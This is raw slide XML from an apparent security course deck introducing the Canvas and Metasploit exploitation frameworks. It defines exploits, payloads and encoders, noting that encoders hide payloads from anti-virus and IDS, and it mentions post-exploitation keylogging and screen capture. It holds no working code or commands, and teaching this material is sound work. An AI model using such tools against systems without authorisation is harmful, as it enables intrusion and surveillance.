                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Connect to sock or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>call back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MOSDEF session allows for arbitrary code execution (can get screenshots, video, keylogging, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</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bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="990600"/>
            <a:ext cx="11703050" cy="102552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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Canvas Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9EDBA328-ED65-4A65-91E7-622734DF3D81}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="2286000"/>
            <a:ext cx="11506200" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62469" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1701800" y="1981200"/>
            <a:ext cx="9594850" cy="7456488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="990600"/>
            <a:ext cx="11703050" cy="102552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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Canvas – Launch Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8F2693C9-8546-4723-921C-D3B7EE3A3165}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="2286000"/>
            <a:ext cx="11506200" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67589" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2082800" y="1828800"/>
            <a:ext cx="8520113" cy="6624638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2C13D8EF-AF53-451C-A0C0-75E29B42F0C5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="914400"/>
            <a:ext cx="11703050" cy="9048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The Metasploit Framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Open Source Development Framework for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Penetration testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Patch verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Regression testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Security Research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Runs on Linux, Mac OS X, BSD, Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Remote and local exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ability to create exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Developed by HD Moore. Recently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acquired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> by Rapid7. All indications are that it will remain open source.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69637" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8940800" y="1752600"/>
            <a:ext cx="3810000" cy="2730500"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="914400"/>
            <a:ext cx="12204700" cy="85725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Terms	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659"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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – weakness in a system which allows an attacker to reduce the systems security posture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – code which allows an attacker to take advantage of the vulnerability in the system.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – The code which is delivered by the exploit.   This is the code which actually runs on the system.    Post exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Encoders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – Way to obfuscate the payload code so that anti-virus and IDS won’t detect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Auxiliary Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>– other parts of Metasploit that aid in exploitation such as scanners</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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="990600"/>
            <a:ext cx="12204700" cy="855663"/>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Why?	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683"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Individual exploit code hard to manage, update and customize.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No code reuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>With a framework there is no need to customize exploits to match payload code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mix and match exploits and payloads easily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rapid development of new exploit code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8813800"/>
            <a:ext cx="13004800" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Framework allows anyone to add a exploit, payload, encoder, aux</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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0E1943C0-20EE-4E06-A6AC-2B47A0B34E9F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="838200"/>
            <a:ext cx="11703050" cy="9048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Architecture Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72708" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9093200" y="1044575"/>
            <a:ext cx="3911600" cy="392113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Diagram from offensive-security.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72709" name="Picture 11" descr="http://www.offensive-security.com/w/images/b/bf/MsfArch.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616200" y="1593850"/>
            <a:ext cx="7696200" cy="7840663"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1168400" y="4572000"/>
            <a:ext cx="11053763" cy="1936750"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="0" cap="none">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>General Attack Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A28E986D-0B5C-46B2-92C1-784EF489942E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="990600"/>
            <a:ext cx="12204700" cy="86995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More About Payloads	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
